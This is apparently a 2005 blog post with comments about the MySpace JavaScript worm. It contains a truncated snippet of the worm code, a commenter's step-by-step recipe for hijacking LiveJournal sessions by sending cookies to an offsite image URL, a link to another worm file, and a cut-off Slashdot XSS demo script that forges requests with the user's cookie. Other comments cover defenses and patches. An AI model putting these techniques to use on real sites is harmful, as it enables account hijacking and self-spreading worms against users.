08:44 am, 13 Oct 05
myspace worm
MySpace worm using Javascript.
That post hypothesizes the problem is using GET instead of POST (both LJ and Orkut and many other apps did this), but it looks more complicated than that. Here's a reformatted snippet of the worm code, which looks like it GETs one page, retrieves a token from it, and then does the POST to actually make the change:
That post hypothesizes the problem is using GET instead of POST (both LJ and Orkut and many other apps did this), but it looks more complicated than that. Here's a reformatted snippet of the worm code, which looks like it GETs one page, retrieves a token from it, and then does the POST to actually make the change:
main(){
var AN=getClientFID();
var BH='/index.cfm?fuseaction=user.viewProfi
J=getXMLObj();
httpSend(BH,getHome,'GET');
xmlhttp2=getXMLObj();
httpSend2('/index.cfm?fuseaction=invite.a
function processxForm(){
if(xmlhttp2.readyState!=4){return}
var AU=xmlhttp2.responseText;
var AQ=getHiddenParameter(AU,'hashcode');
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['hashcode']=AQ;
AS['friendID']='11851658';
AS['submit']='Add to Friends';
httpSend2('/index.cfm?fuseaction=invite.a
}
-- Philipp, Google Blogoscoped
The default JS security model is to only allow it to access the properties of the site it's loaded from - http://www.mozilla.org/projects/security/c
Use Moz!!!
Avoid that nasty IE thing it bites!Re: Use Moz!!!
AJAX exploits
It's the new thing. If you can execute JS on a site, you can pretty much take over the entire browser. XMLHttpRequest can silently execute GET and POST requests with the server thinking it's just the user. And the user doesn't suspect a thing since it's all behind the scenes. For example, with LiveJournal, simply do a GET request to login.bml. Parse the login challenge authentication and other login variables. Do a POST to login.bml with this data, but make it so the session never expires and doesn't bind to the IP. Use getAllResponseHeaders to read the headers/cookie (so much for httpOnly cookies). Have JS load an offsite file (easily done with a new image src) with the cookie info added on. LJ account is now hijacked as long as the user doesn't hit log out. Of course, this only works if one hypothetically finds a way to get past cleanhtml.pl and let LJ display JS code.Re: AJAX exploits
It's happened before. The fixes are normally made quietly without much fanfare to give the clone sites a chance to upgrade before they get got. Fortunately, I don't think there's much left that hasn't been scrutinised and escaped or cleaned like crazy.
Re: AJAX exploits
Re: AJAX exploits
The most effective user available countermeasure is whitelist-based JavaScript blocking: Firefox + NoScript (http://noscript.net).Re: AJAX exploits
Re: AJAX exploits
Re: AJAX exploits
Re: AJAX exploits
(ducks)
-j
your in the news even
All I'll say is this.....
One you've been secondary /.'edTwo "When the bad guy can run code on your computer, it's not your computer anymore." You'd think they'd know that first you gotta assume that someone would have a compromisable browser and design web apps against it, and also some sanity checking of some sort, I mean should _SOMETHING_ have killed this worm when hit a few hundred users a sec, or hell just tens of users a sec. I'd personally say that Myspace is just as responsible.
Re: All I'll say is this.....
responsible for what? allowing the worm to spread? allowing security holes to exist? sounds like they had no power over the situation. I figure its pretty hard to notice somthing like that on a high-traffic site like mySpace, you see extra activity and you think "wow busy day today" not "oh crap a worm is eating my site" Thanks to Samy for alerting us all about this "undocumented feature" thanks to evan for the code, pretty simple for somthing that did so much. I'm glad it was harmless, i'm sure microsoft will come up with some token patch that "eliminates" (makes worse) this problem.:)
D
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
ifwhen this is going to be spread to Xanga (which doesn't filter JS at all).Soon
If they are smart they probably already started tightening some security... so yes the worm will probably be there soon too. ;-) ( I hate xanga)Re: Soon
However, unlike Myspace, I don't think there's any way to inject the javascript onto other user's pages (other than comments), so it wouldn't spread quite as easily.
I've written to Xanga about their huge vulnerabilities, but they've never done anything about it. Hopefully, the Myspace attack will make them a bit more aware and take some action.
xanga worm
A worm has been recently placed on xanga by a user called Davusiot.Re: xanga worm
Re: xanga worm
Re: xanga worm
Not first :)
I did this in August 2005 in our local (Latvian) "myspace" which has like 430k+ users, though I didn't release it (it worked), because I don't want new roommates.Here's the "worm" http://lethal.fabrika.lv/draugberts2.js You sent it in a message with a special tag (e.g. [div style="background-image:url(javascript:d
It is made very understandably, so even people who don't know very much about JS or programming can edit it and use it somewhere else.
Re: Not first :)
Re: Not first :)
Re: Not first :)
hi
loldongsRe: hi
patched on site spaces
This vunerability was reported and patched on beerco's sitespaces.netIf anybody finds that it hasn't been sufficiently patched, please contact "tux" the linux penguin on the site and file a bug report
using javascript
The title of this post is correct. Many sites are calling this a cross site scripting worm. The worm used javascript, yes, but is not XSS. XSS is when the client sends the payload to the server and the server echos it back. This payload came from the server. I believe securityfocus and other sites referr to this as 'script injection'.Thought I'd clear this up before more "security professionals" start giving quotes on how dangerous XSS is and just end up looking like fools.
other possibilities
Slashdot XSS Demo
The XSS hole in Slashdot (Slash: http://slashcode.com/) has since been closed but it serves as another demonstration of the same technique.
/******************************** /** http://www.zapthedingbat.com/ /******************************** var sUserAgent = navigator.userAgent.toLowerCase(); var isOpera = sUserAgent.indexOf("opera")!=-1; var isIe = sUserAgent.indexOf("msie")!=-1&&(document.all&&!isOpera); var isIe5 = sUserAgent.indexOf("msie 5")!=-1&&(document.all&&!isOpera); function newRequest(){ var oCtl = null; if (isIe){ var aProgIds = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP'); for (var i=0; i < aProgIds.length && (!oCtl); i++) { try{ oCtl = new ActiveXObject(aProgIds[i]); }catch(e){} } }else{ oCtl = new XMLHttpRequest(); } return oCtl; } function getFormKey(){ var oRequest = newRequest(); if (oRequest) { oRequest.open('GET', 'http://slashdot.org/journal.pl?op=edit', false); oRequest.setRequestHeader('Cookie', document.cookie); oRequest.setRequestHeader('Cookie', document.cookie); oRequest.setRequestHeader('User-Agent', 'Mozilla/4.0 (compatible; MSIE 6.0)'); oRequest.setRequestHeader('Referer', 'http://slashdot.org/'); oRequest.send(null); var sResponse = oRequest.responseText; try{ return sResponse.match(/Re: Slashdot XSS Demo
nah
where to paste the html code in myspace?where to paste the source code??
where to paste the source code??Re: where to paste the source code??
yaaa
i luvv u!!Re: yaaa